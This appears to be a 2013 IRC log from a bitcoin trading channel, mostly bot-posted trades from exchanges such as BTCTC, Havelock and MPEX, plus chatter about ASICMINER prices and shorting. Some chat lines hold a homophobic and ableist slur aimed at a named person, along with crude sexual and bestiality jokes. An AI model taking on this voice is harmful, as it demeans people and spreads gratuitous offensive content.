[S.DICE-PT] 9 @ 0.002249 = 0.0202 BTC [+] Jun 30 18:22:59 [BTCTC] [S.DICE-PT] 184 @ 0.00225 = 0.414 BTC [+] Jun 30 18:26:17 [BTCTC] [TAT.ASICMINER] 50 @ 0.043 = 2.15 BTC [+] Jun 30 18:30:37 [BTCTC] [DMS.PURCHASE] 50 @ 0.049909 = 2.4955 BTC [-] Jun 30 18:31:47 [HAVELOCK] [ASICM] 2 @ 0.0427 = 0.0854 BTC [-] Jun 30 18:32:45 [BTCTC] [DMS.MINING] 18 @ 0.01989 = 0.358 BTC [-] Jun 30 18:32:47 [BTCTC] [DMS.MINING] 30 @ 0.019891 = 0.5967 BTC [+] Jun 30 18:32:47 [BTCTC] [DMS.MINING] 51 @ 0.019897 = 1.0147 BTC [+] Jun 30 18:32:48 [BTCTC] [DMS.MINING] 21 @ 0.0199 = 0.4179 BTC [+] Jun 30 18:32:50 [BTCTC] [DMS.MINING] 30 @ 0.01999 = 0.5997 BTC [+] Jun 30 18:33:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.042002 = 0.21 BTC [-] Jun 30 18:34:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jun 30 18:35:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.043 = 0.387 BTC [+] Jun 30 18:36:03 [BTCTC] [DMS.PURCHASE] 21 @ 0.053474 = 1.123 BTC [+] Jun 30 18:36:23 [BTCTC] [DMS.MINING] 27 @ 0.01999 = 0.5397 BTC [+] Jun 30 18:36:24 [BTCTC] [DMS.MINING] 23 @ 0.021198 = 0.4876 BTC [+] Jun 30 18:37:39 [BTCTC] [DMS.SELLING] 4 @ 0.033201 = 0.1328 BTC [-] Jun 30 18:37:41 [BTCTC] [DMS.SELLING] 50 @ 0.0332 = 1.66 BTC [-] Jun 30 18:37:42 [BTCTC] [DMS.SELLING] 3 @ 0.0327 = 0.0981 BTC [-] Jun 30 18:38:21 [BTCTC] [DMS.PURCHASE] 56 @ 0.053474 = 2.9945 BTC [+] Jun 30 18:38:58 [BTCTC] [AMC-PT] 15 @ 0.001249 = 0.0187 BTC [+] Jun 30 18:40:21 [BTCTC] [AMC-PT] 135 @ 0.00125 = 0.1688 BTC [+] Jun 30 18:40:52 ;;ticker Jun 30 18:40:52 MtGox BTCUSD ticker | Best bid: 96.95001, Best ask: 97.39000, Bid-ask spread: 0.43999, Last trade: 96.74000, 24 hour volume: 12367.66657714, 24 hour low: 93.70000, 24 hour high: 98.12228, 24 hour vwap: 95.93530 Jun 30 18:41:07 ;;asks 100.08 Jun 30 18:41:09 There are currently 5328.0472 bitcoins offered at or under 100.08 USD, worth 529413.152945 USD in total. | Data vintage: 0.0040 seconds Jun 30 18:41:37 ;;asks 99.8 Jun 30 18:41:37 There are currently 3363.9456 bitcoins offered at or under 99.8 USD, worth 333041.740231 USD in total. | Data vintage: 28.5502 seconds Jun 30 18:41:43 ;;bids 0 Jun 30 18:41:44 There are currently 22227954 bitcoins demanded at or over 0.0 USD, worth 12121971.8146 USD in total. | Data vintage: 35.1275 seconds Jun 30 18:42:13 [BTCTC] [S.DICE-PT] 50 @ 0.0022 = 0.11 BTC [-] Jun 30 18:42:16 [HAVELOCK] [ASICM] 20 @ 0.0428011 = 0.856 BTC [+] Jun 30 18:42:22 [HAVELOCK] [ASICM] 2 @ 0.0428011 = 0.0856 BTC [+] Jun 30 18:43:03 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Jun 30 18:47:25 [MPEX] [S.MPOE] 15774 @ 0.0008301 = 13.094 BTC [-] Jun 30 18:55:51 [BTCTC] [ASICMINER-PT] 1 @ 4.349999 BTC [+] Jun 30 18:56:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jun 30 18:57:38 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199 = 0.995 BTC [-] Jun 30 18:57:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1989 BTC [-] Jun 30 18:57:41 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1988 BTC [-] Jun 30 18:58:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003666 BTC [+] Jun 30 18:59:56 [HAVELOCK] [ASICM] 7 @ 0.04279 = 0.2995 BTC [-] Jun 30 19:00:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.04201 = 0.126 BTC [-] Jun 30 19:02:59 [BTCTC] [ASICMINER-PT] 7 @ 4.3 = 30.1 BTC [-] Jun 30 19:04:52 [BTCTC] [DMS.SELLING] 2 @ 0.035897 = 0.0718 BTC [+] Jun 30 19:05:21 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jun 30 19:06:10 [BTCTC] [AMC-PT] 1 @ 0.0012 BTC [-] Jun 30 19:06:11 [BTCTC] [AMC-PT] 1 @ 0.001249 BTC [+] Jun 30 19:06:13 [BTCTC] [AMC-PT] 1200 @ 0.00125 = 1.5 BTC [+] Jun 30 19:06:14 [BTCTC] [AMC-PT] 36 @ 0.00128 = 0.0461 BTC [+] Jun 30 19:06:15 [BTCTC] [AMC-PT] 500 @ 0.001289 = 0.6445 BTC [+] Jun 30 19:06:17 [BTCTC] [AMC-PT] 2057 @ 0.001299 = 2.672 BTC [+] Jun 30 19:06:32 [HAVELOCK] [ASICM] 4 @ 0.0428001 = 0.1712 BTC [+] Jun 30 19:07:48 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jun 30 19:08:14 [BTCTC] [S.MPOE-PT] 15 @ 0.000992 = 0.0149 BTC [-] Jun 30 19:08:17 [BTCTC] [DMS.SELLING] 4 @ 0.032706 = 0.1308 BTC [-] Jun 30 19:08:19 [BTCTC] [DMS.SELLING] 50 @ 0.0321 = 1.605 BTC [-] Jun 30 19:08:19 [BTCTC] [DMS.SELLING] 6 @ 0.03101 = 0.1861 BTC [-] Jun 30 19:08:45 [BTCTC] [AMC-PT] 3789 @ 0.0013 = 4.9257 BTC [+] Jun 30 19:11:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.04201 = 0.2521 BTC [-] Jun 30 19:12:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.042005 BTC [-] Jun 30 19:13:09 [BTCTC] [TAT.ASICMINER] 29 @ 0.04201 = 1.2183 BTC [+] Jun 30 19:13:55 [HAVELOCK] [HIM] 1 @ 0.31 BTC [+] Jun 30 19:15:02 [HAVELOCK] [ASICM] 24 @ 0.0429 = 1.0296 BTC [+] Jun 30 19:15:22 [BTCTC] [ASICMINER-PT] 10 @ 4.3 = 43 BTC [-] Jun 30 19:15:24 [HAVELOCK] [ASICM] 1 @ 0.0429 BTC [+] Jun 30 19:15:47 [BTCTC] [CRYPTO-TRADE] 8 @ 0.2 = 1.6 BTC [+] Jun 30 19:17:02 [BTCTC] [ASICMINER-PT] 4 @ 4.25 = 17 BTC [-] Jun 30 19:18:09 [BTCTC] [TAT.ASICMINER] 54 @ 0.0428 = 2.3112 BTC [+] Jun 30 19:19:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.0428 = 0.2996 BTC [+] Jun 30 19:19:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.0428 = 0.0856 BTC [+] Jun 30 19:20:36 [HAVELOCK] [ASICM] 2 @ 0.04280015 = 0.0856 BTC [-] Jun 30 19:20:52 [HAVELOCK] [ASICM] 7 @ 0.0428001 = 0.2996 BTC [-] Jun 30 19:21:05 [HAVELOCK] [ASICM] 10 @ 0.0427 = 0.427 BTC [-] Jun 30 19:21:14 [HAVELOCK] [ASICM] 121 @ 0.041803 = 5.0582 BTC [-] Jun 30 19:21:34 [HAVELOCK] [ASICM] 100 @ 0.04180111 = 4.1801 BTC [-] Jun 30 19:24:18 [BTCTC] [DMS.MINING] 10 @ 0.021198 = 0.212 BTC [+] Jun 30 19:24:30 [MPEX] [S.DICE] 334 @ 0.00274999 = 0.9185 BTC [+] Jun 30 19:25:47 [HAVELOCK] [ASICM] 100 @ 0.0407 = 4.07 BTC [-] Jun 30 19:26:02 [HAVELOCK] [ASICM] 100 @ 0.040588 = 4.0588 BTC [-] Jun 30 19:26:07 [BTCTC] [DMS.PURCHASE] 37 @ 0.0495 = 1.8315 BTC [-] Jun 30 19:26:19 [HAVELOCK] [ASICM] 10 @ 0.0404 = 0.404 BTC [-] Jun 30 19:26:29 [HAVELOCK] [ASICM] 129 @ 0.03900002 = 5.031 BTC [-] Jun 30 19:26:55 [BTCTC] [DMS.PURCHASE] 4 @ 0.0495 = 0.198 BTC [-] Jun 30 19:27:23 [BTCTC] [TAT.ASICMINER] 81 @ 0.043 = 3.483 BTC [+] Jun 30 19:28:27 [BTCTC] [AMC-PT] 300 @ 0.001349 = 0.4047 BTC [+] Jun 30 19:28:29 [BTCTC] [AMC-PT] 100 @ 0.00135 = 0.135 BTC [+] Jun 30 19:28:30 [BTCTC] [AMC-PT] 600 @ 0.00135 = 0.81 BTC [+] **** ENDING LOGGING AT Sun Jun 30 19:47:36 2013 **** BEGIN LOGGING AT Mon Jul 1 03:05:07 2013 Jul 01 03:06:45 thestringpuller: I checked base goog, looks stock, what are you seeing? Jul 01 03:06:57 http://serato.com/latest/blog/15937/martin-from-support-on-the-vestax-vci-380 DO WANT Jul 01 03:07:02 Martin from Support on the Vestax VCI-380 | Blog | Serato.com Jul 01 03:18:10 spent a lot of time fuckign with the vci-300 and always wanted an MPC style cue pad with it Jul 01 03:18:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.042978 BTC [-] Jul 01 03:19:14 [BTCTC] [AMC-PT] 50 @ 0.00125 = 0.0625 BTC [-] Jul 01 03:19:55 [BTCTC] [TAT.ASICMINER] 23 @ 0.042979 = 0.9885 BTC [+] Jul 01 03:21:55 > Thats not DJing thats PBing, so please stop to call it DJ. Jul 01 03:21:56 lol Jul 01 03:23:24 lolwut ? Jul 01 03:32:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.042979 BTC [+] Jul 01 03:32:46 yeah commenters on the internet are assholes, who knew? Jul 01 03:35:57 [BTCTC] [TAT.ASICMINER] 8 @ 0.042978 = 0.3438 BTC [-] Jul 01 03:36:24 [HAVELOCK] [ASICM] 20 @ 0.0429999 = 0.86 BTC [+] Jul 01 03:36:37 [HAVELOCK] [ASICM] 3 @ 0.0429999 = 0.129 BTC [+] Jul 01 03:37:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.042979 = 0.1719 BTC [+] Jul 01 03:38:17 dude, asicminer share price is crazy Jul 01 03:40:18 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00465 = 0.0093 BTC [+] Jul 01 03:41:48 why now ? Jul 01 03:41:52 was just as crazy before. Jul 01 03:41:59 yeah Jul 01 03:42:02 true Jul 01 03:42:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.042979 = 0.2149 BTC [+] Jul 01 03:42:43 [HAVELOCK] [ASICM] 3 @ 0.0429999 = 0.129 BTC [+] Jul 01 03:42:51 good you couldnt short it eh Jul 01 03:42:51 I want my 696 shares back... and sell them now instead Jul 01 03:42:55 eheh Jul 01 03:43:22 [BTCTC] [ASICMINER-PT] 1 @ 4.250347 BTC [-] Jul 01 03:43:24 [BTCTC] [ASICMINER-PT] 1 @ 4.250343 BTC [-] Jul 01 03:43:26 [BTCTC] [ASICMINER-PT] 1 @ 4.2503 BTC [-] Jul 01 03:43:27 [BTCTC] [ASICMINER-PT] 1 @ 4.2502 BTC [-] Jul 01 03:46:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.042506 BTC [-] Jul 01 03:46:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.042505 = 0.2125 BTC [-] Jul 01 03:46:15 [BTCTC] [TAT.ASICMINER] 48 @ 0.0425 = 2.04 BTC [-] Jul 01 03:46:17 [BTCTC] [TAT.ASICMINER] 50 @ 0.0421 = 2.105 BTC [-] Jul 01 03:46:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.0421 = 0.1684 BTC [-] Jul 01 03:46:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0421 BTC [-] Jul 01 03:46:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.04201 BTC [-] Jul 01 03:46:23 [BTCTC] [TAT.ASICMINER] 12 @ 0.04201 = 0.5041 BTC [-] Jul 01 03:46:25 [BTCTC] [TAT.ASICMINER] 16 @ 0.042 = 0.672 BTC [-] Jul 01 03:47:14 kakobrekla yeah. except i still can't short it. Jul 01 03:47:30 for all the talk of these financial cats the market's as frozen as antarctica. Jul 01 03:47:49 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 01 03:47:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.042978 BTC [+] Jul 01 03:48:34 what's frozen? Jul 01 03:48:37 in particular? Jul 01 03:49:13 There's also a flabbergasting lack of any kind of bid support for ASICMINER Jul 01 03:49:14 [BTCTC] [DMS.MINING] 2 @ 0.01848 = 0.037 BTC [+] Jul 01 03:49:40 thestringpuller the market. Jul 01 03:50:23 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [+] Jul 01 03:50:52 Perhaps there's hope yet... http://nextbigfuture.com/2013/06/technical-hurdles-have-been-overcome.html Jul 01 03:51:11 There's probably like ~1200 total in bids on the way down to 0.01 BTC per ASICMINER Jul 01 03:52:03 who;s gonna donate heads. Jul 01 03:52:08 easier to just recycle the stupid. Jul 01 03:52:34 I'm nore thinking that people can be useful as replacement bodies after their heads have been confiscated. Jul 01 03:53:01 instead of execution, swap heads Jul 01 03:53:08 with someone who needs a body Jul 01 03:53:50 ah Jul 01 03:53:56 im not sure i want to grace the body of an idiot Jul 01 03:53:59 mircea_popescu: what market? turnip market? movie market? etc? Jul 01 03:54:00 he probably did stupid things to it. Jul 01 03:54:09 thestringpuller we were discussing asicminer you know Jul 01 03:54:17 oh Jul 01 03:54:24 specifically shorting it Jul 01 03:54:52 [BTCTC] [LTC-MINING] 1 @ 0.292 BTC [-] Jul 01 03:55:10 [BTCTC] [DMS.SELLING] 7 @ 0.031499 = 0.2205 BTC [-] Jul 01 03:55:12 https://bitcointalk.org/index.php?topic=159560.msg2622457#msg2622457 Jul 01 03:55:12 [BTCTC] [DMS.SELLING] 8 @ 0.031499 = 0.252 BTC [-] Jul 01 03:55:17 New ASIC Cedartec [Probable SCAM] Jul 01 03:55:22 i guess you all missed out on that hot stuff huh ? Jul 01 03:55:26 [BTCTC] [ASICMINER-PT] 1 @ 4.1506 BTC [-] Jul 01 03:55:28 [BTCTC] [ASICMINER-PT] 3 @ 4.1505 = 12.4515 BTC [-] Jul 01 03:55:30 [BTCTC] [ASICMINER-PT] 2 @ 4.1504 = 8.3008 BTC [-] Jul 01 03:55:37 might be nice to holiday a while on the body of a hot female Jul 01 03:55:52 you know dub, if you'd like to swallow some manlove you can just say. Jul 01 03:55:52 stay at home and play with your tits Jul 01 03:56:07 yeah, well you like head jars better? Jul 01 03:56:17 kakobrekla peach. Jul 01 03:56:29 hum? Jul 01 03:56:34 peach jam jar head Jul 01 03:56:47 heh Jul 01 03:56:50 [BTCTC] [AMC-PT] 324 @ 0.001155 = 0.3742 BTC [-] Jul 01 03:57:15 kid at school we called jamjar Jul 01 03:57:31 you can probable extrapolate why Jul 01 03:58:04 [BTCTC] [AMC-PT] 200 @ 0.001152 = 0.2304 BTC [-] Jul 01 03:58:48 http://3.bp.blogspot.com/_Uy2jpMqNnio/TN7o-WO1y1I/AAAAAAAABZM/M11uF6RsO3M/s1600/muslim-attack-goat.jpg << i googled buttsex with a goat and that's what it gave me Jul 01 03:59:00 dubs way Jul 01 03:59:36 I'm more interested in knowing why you googled that... Jul 01 03:59:58 [BTCTC] [AMC-PT] 1 @ 0.001151 BTC [-] Jul 01 04:00:00 [BTCTC] [AMC-PT] 1385 @ 0.001133 = 1.5692 BTC [-] Jul 01 04:00:02 [BTCTC] [AMC-PT] 100 @ 0.001132 = 0.1132 BTC [-] Jul 01 04:00:03 [BTCTC] [AMC-PT] 35 @ 0.00113 = 0.0396 BTC [-] Jul 01 04:00:15 [BTCTC] [AMC-PT] 40 @ 0.00113 = 0.0452 BTC [-] Jul 01 04:00:17 [BTCTC] [AMC-PT] 1429 @ 0.00112 = 1.6005 BTC [-] Jul 01 04:00:19 i was thinking about finance and jam jars. Jul 01 04:00:19 [BTCTC] [AMC-PT] 100 @ 0.0011 = 0.11 BTC [-] Jul 01 04:00:25 somehow this is what came out Jul 01 04:00:50 Yeah, I'll use that the next time my embarrasing fetishes come out too... Jul 01 04:00:52 [BTCTC] [AMC-PT] 500 @ 0.00103 = 0.515 BTC [-] Jul 01 04:00:53 :-P Jul 01 04:00:53 [BTCTC] [AMC-PT] 2 @ 0.001025 = 0.0021 BTC [-] Jul 01 04:00:55 [BTCTC] [AMC-PT] 54 @ 0.00102 = 0.0551 BTC [-] Jul 01 04:01:15 [BTCTC] [ASICMINER-PT] 1 @ 4.1505 BTC [+] Jul 01 04:01:17 [BTCTC] [ASICMINER-PT] 3 @ 4.1504 = 12.4512 BTC [-] Jul 01 04:01:19 [BTCTC] [ASICMINER-PT] 1 @ 4.1502 BTC [-] Jul 01 04:01:21 [BTCTC] [ASICMINER-PT] 3 @ 4.15 = 12.45 BTC [-] Jul 01 04:02:02 gotta bear in mind i'm unembarassable, which may be a required feature. Jul 01 04:02:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.0428 = 0.856 BTC [-] Jul 01 04:02:55 [BTCTC] [TAT.ASICMINER] 7 @ 0.0428 = 0.2996 BTC [-] Jul 01 04:02:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042001 BTC [-] Jul 01 04:02:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.042 = 0.168 BTC [-] Jul 01 04:03:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.041505 = 2.0753 BTC [-] Jul 01 04:04:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.042979 BTC [+] Jul 01 04:04:55 [HAVELOCK] [ASICM] 5 @ 0.0429999 = 0.215 BTC [+] Jul 01 04:09:36 why does seth godin look like a total retard/faggot these days ? Jul 01 04:09:39 nm. Jul 01 04:09:48 [BTCTC] [ASICMINER-PT] 2 @ 4.288693 = 8.5774 BTC [+] Jul 01 04:09:50 [BTCTC] [ASICMINER-PT] 1 @ 4.288693 BTC [+] Jul 01 04:09:52 [BTCTC] [ASICMINER-PT] 2 @ 4.288694 = 8.5774 BTC [+] Jul 01 04:10:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.042978 BTC [-] Jul 01 04:10:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.042979 = 0.2149 BTC [+] Jul 01 04:13:28 [BTCTC] [TAT.ASICMINER] 53 @ 0.042979 = 2.2779 BTC [+] Jul 01 04:14:13 [BTCTC] [DMS.MINING] 3 @ 0.01848 = 0.0554 BTC [+] Jul 01 04:15:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.042979 BTC [+] Jul 01 04:16:02 [BTCTC] [AMC-PT] 500 @ 0.001022 = 0.511 BTC [+] Jul 01 04:16:03 [BTCTC] [AMC-PT] 100 @ 0.001021 = 0.1021 BTC [-] Jul 01 04:16:04 [BTCTC] [AMC-PT] 400 @ 0.00102 = 0.408 BTC [-] Jul 01 04:16:33 [BTCTC] [AMC-PT] 746 @ 0.00102 = 0.7609 BTC [-] Jul 01 04:16:35 [BTCTC] [AMC-PT] 164 @ 0.00102 = 0.1673 BTC [-] Jul 01 04:18:07 [BTCTC] [RSM] 6 @ 0.017501 = 0.105 BTC [-] Jul 01 04:18:11 [BTCTC] [RSM] 1 @ 0.0175 BTC [-] Jul 01 04:18:21 [BTCTC] [DMS.MINING] 20 @ 0.017007 = 0.3401 BTC [-] Jul 01 04:18:22 [BTCTC] [RSM] 1 @ 0.01735 BTC [-] Jul 01 04:18:24 [BTCTC] [DMS.MINING] 55 @ 0.017006 = 0.9353 BTC [-] Jul 01 04:18:26 [BTCTC] [RSM] 2 @ 0.0162 = 0.0324 BTC [-] Jul 01 04:18:28 [BTCTC] [RSM] 1 @ 0.01604 BTC [-] Jul 01 04:18:28 [BTCTC] [RSM] 10 @ 0.015 = 0.15 BTC [-] Jul 01 04:18:30 [BTCTC] [RSM] 90 @ 0.015 = 1.35 BTC [-] Jul 01 04:19:08 [BTCTC] [ASICMINER-PT] 5 @ 4.288685 = 21.4434 BTC [-] Jul 01 04:19:41 [BTCTC] [TAT.ASICMINER] 29 @ 0.042979 = 1.2464 BTC [+] Jul 01 04:22:12 [BTCTC] [TAT.ASICMINER] 15 @ 0.042979 = 0.6447 BTC [+] Jul 01 04:27:20 [BTCTC] [AMC-PT] 81 @ 0.00102 = 0.0826 BTC [-] Jul 01 04:27:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.042979 = 0.1719 BTC [+] Jul 01 04:29:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [+] Jul 01 04:32:15 [MPEX] [S.MPOE] 6200 @ 0.00082683 = 5.1263 BTC [-] Jul 01 04:34:39 [BTCTC] [ASICMINER-PT] 2 @ 4.279 = 8.558 BTC [-] Jul 01 04:35:14 http://www.dailymail.co.uk/health/article-2339588/Up-12-women-allergic-semen-claims-leading-expert--wrongly-blaming-symptoms-STDs.html Jul 01 04:35:33 Up to 12% of women could be 'allergic to semen' claims leading expert - with many wrongly blaming th Jul 01 04:36:25 'Free semen allergy test' Jul 01 04:36:31 [MPEX] [S.MPOE] 1219 @ 0.00082683 = 1.0079 BTC [-] Jul 01 04:36:33 anyone's an expert these days Jul 01 04:37:31 [MPEX] [S.MPOE] 111 @ 0.00082683 = 0.0918 BTC [-] Jul 01 04:37:42 it seems to only cover sperm in the vagina. who cares Jul 01 04:39:00 semen in vagina? how pedestrian Jul 01 04:45:34 [MPEX] [S.MPOE] 4170 @ 0.00082683 = 3.4479 BTC [-] Jul 01 04:46:21 [BTCTC] [AMC-PT] 400 @ 0.00102 = 0.408 BTC [-] Jul 01 04:47:12 [BTCTC] [CRYPTO-TRADE] 12 @ 0.2 = 2.4 BTC [+] Jul 01 04:48:56 [BTCTC] [TAT.VIRTUALMINE] 275 @ 0.004628 = 1.2727 BTC [-] Jul 01 04:51:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0429 = 0.2145 BTC [-] Jul 01 04:52:53 [BTCTC] [ASICMINER-PT] 1 @ 4.279 BTC [-] Jul 01 04:55:21 [BTCTC] [TAT.ASICMINER] 22 @ 0.043 = 0.946 BTC [+] Jul 01 04:55:23 [BTCTC] [TAT.ASICMINER] 37 @ 0.043 = 1.591 BTC [+] Jul 01 05:01:22 jesus fuck somebody wants me to attend a meeting at 9am Jul 01 05:01:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 01 05:03:12 [BTCTC] [TAT.ASICMINER] 15 @ 0.0429 = 0.6435 BTC [-] Jul 01 05:04:27 =O Jul 01 05:04:46 9 am? Who is even up at 5 am! Jul 01 05:05:20 Ugh... 9 am* Jul 01 05:05:26 2 PM to wake up at the earliest. Jul 01 05:08:14 usually on my 3rd coffee by 9 but its still far to early for meetings Jul 01 05:08:58 [BTCTC] [AMC-PT] 200 @ 0.0012 = 0.24 BTC [+] Jul 01 05:14:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0429 BTC [-] Jul 01 05:15:40 [BTCTC] [DMS.MINING] 20 @ 0.018475 = 0.3695 BTC [+] Jul 01 05:17:51 [HAVELOCK] [ASICM] 9 @ 0.0429999 = 0.387 BTC [+] Jul 01 05:18:56 [BTCTC] [BTC-GOLD] 1 @ 0.00988 BTC [+] Jul 01 05:19:19 [BTCTC] [BTC-GOLD] 2 @ 0.01 = 0.02 BTC [+] Jul 01 05:22:01 [BTCTC] [ASICMINER-PT] 1 @ 4.269 BTC [-] Jul 01 05:22:15 [BTCTC] [BASIC-MINING] 1 @ 0.174999 BTC [+] Jul 01 05:22:18 [BTCTC] [ASICMINER-PT] 1 @ 4.269 BTC [-] Jul 01 05:22:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.043 = 0.129 BTC [+] Jul 01 05:22:37 [BTCTC] [ASICMINER-PT] 1 @ 4.27 BTC [+] Jul 01 05:22:54 [BTCTC] [ASICMINER-PT] 1 @ 4.279 BTC [+] Jul 01 05:23:13 [BTCTC] [ASICMINER-PT] 2 @ 4.2887 = 8.5774 BTC [+] Jul 01 05:23:40 [BTCTC] [ASICMINER-PT] 1 @ 4.289 BTC [+] Jul 01 05:23:55 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [+] Jul 01 05:24:15 [BTCTC] [ASICMINER-PT] 1 @ 4.294 BTC [+] Jul 01 05:24:46 [BTCTC] [ASICMINER-PT] 1 @ 4.295 BTC [+] Jul 01 05:25:07 [MPEX] [S.MPOE] 1143 @ 0.00082797 = 0.9464 BTC [+] Jul 01 05:25:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.043 = 2.15 BTC [+] Jul 01 05:26:02 [BTCTC] [AMC-PT] 1532 @ 0.001199 = 1.8369 BTC [-] Jul 01 05:26:18 [BTCTC] [AMC-PT] 68 @ 0.001199 = 0.0815 BTC [-] Jul 01 05:26:20 [BTCTC] [AMC-PT] 240 @ 0.001021 = 0.245 BTC [-] Jul 01 05:26:21 [BTCTC] [AMC-PT] 355 @ 0.00102 = 0.3621 BTC [-] Jul 01 05:26:22 [BTCTC] [AMC-PT] 90 @ 0.001002 = 0.0902 BTC [-] Jul 01 05:26:23 [BTCTC] [AMC-PT] 100 @ 0.001 = 0.1 BTC [-] Jul 01 05:26:24 [BTCTC] [AMC-PT] 100 @ 0.001 = 0.1 BTC [-] Jul 01 05:26:25 [BTCTC] [AMC-PT] 4 @ 0.001 = 0.004 BTC [-] Jul 01 05:26:57 [BTCTC] [AMC-PT] 43 @ 0.001 = 0.043 BTC [-] Jul 01 05:27:28 [BTCTC] [AMC-PT] 25 @ 0.0012 = 0.03 BTC [+] Jul 01 05:27:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.043 = 0.172 BTC [+] Jul 01 05:29:11 [BTCTC] [BASIC-MINING] 5 @ 0.169101 = 0.8455 BTC [-] Jul 01 05:30:23 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 01 05:31:27 [BTCTC] [DMS.MINING] 21 @ 0.018476 = 0.388 BTC [+] Jul 01 05:31:29 [BTCTC] [DMS.MINING] 19 @ 0.018478 = 0.3511 BTC [+] Jul 01 05:31:30 [BTCTC] [DMS.MINING] 18 @ 0.01848 = 0.3326 BTC [+] Jul 01 05:31:31 [BTCTC] [DMS.MINING] 17 @ 0.0185 = 0.3145 BTC [+] Jul 01 05:31:32 [BTCTC] [DMS.MINING] 37 @ 0.018998 = 0.7029 BTC [+] Jul 01 05:31:33 [BTCTC] [DMS.MINING] 63 @ 0.019 = 1.197 BTC [+] Jul 01 05:31:55 [BTCTC] [DMS.MINING] 20 @ 0.019 = 0.38 BTC [+] Jul 01 05:31:56 [BTCTC] [S.DICE-PT] 450 @ 0.00221 = 0.9945 BTC [+] Jul 01 05:36:58 [BTCTC] [ASICMINER-PT] 1 @ 4.294 BTC [+] Jul 01 05:37:37 [BTCTC] [DMS.SELLING] 45 @ 0.031499 = 1.4175 BTC [-] Jul 01 05:38:11 [BTCTC] [DMS.MINING] 55 @ 0.019 = 1.045 BTC [+] Jul 01 05:38:37 [BTCTC] [ASICMINER-PT] 1 @ 4.294 BTC [+] Jul 01 05:38:40 [BTCTC] [ASICMINER-PT] 7 @ 4.295 = 30.065 BTC [+] Jul 01 05:38:50 [BTCTC] [TAT.ASICMINER] 23 @ 0.0431 = 0.9913 BTC [+] Jul 01 05:39:28 [MPEX] [S.MPOE] 7000 @ 0.00082826 = 5.7978 BTC [+] Jul 01 05:39:41 [BTCTC] [CRYPTO-TRADE] 8 @ 0.2 = 1.6 BTC [+] Jul 01 05:39:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.0431 = 0.0862 BTC [+] Jul 01 05:42:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.04251 = 0.2976 BTC [-] Jul 01 05:42:54 [BTCTC] [TAT.ASICMINER] 13 @ 0.042501 = 0.5525 BTC [-] Jul 01 05:43:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.0431 = 0.431 BTC [+] Jul 01 05:43:27 [BTCTC] [ASICMINER-PT] 1 @ 4.294 BTC [-] Jul 01 05:44:40 [BTCTC] [S.DICE-PT] 1 @ 0.0023 BTC [+] Jul 01 05:47:06 [HAVELOCK] [ASICM] 1 @ 0.0429999 BTC [+] Jul 01 05:47:38 [BTCTC] [BASIC-MINING] 5 @ 0.169101 = 0.8455 BTC [-] Jul 01 05:47:39 [HAVELOCK] [ASICM] 3 @ 0.0428 = 0.1284 BTC [-] Jul 01 05:47:41 [HAVELOCK] [ASICM] 6 @ 0.0425 = 0.255 BTC [-] Jul 01 05:47:42 [HAVELOCK] [ASICM] 200 @ 0.04241 = 8.482 BTC [-] Jul 01 05:47:43 [HAVELOCK] [ASICM] 100 @ 0.0424 = 4.24 BTC [-] Jul 01 05:47:44 [HAVELOCK] [ASICM] 435 @ 0.04230001 = 18.4005 BTC [-] Jul 01 05:48:00 [BTCTC] [BASIC-MINING] 10 @ 0.1691 = 1.691 BTC [-] Jul 01 05:48:31 [BTCTC] [BTC-TRADING-PT] 3 @ 0.7 = 2.1 BTC [+] Jul 01 05:50:04 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004689 = 0.0094 BTC [+] Jul 01 05:53:17 [BTCTC] [BASIC-MINING] 10 @ 0.173999 = 1.74 BTC [+] Jul 01 05:53:19 [BTCTC] [BASIC-MINING] 30 @ 0.174 = 5.22 BTC [+] Jul 01 05:55:16 [MPEX] 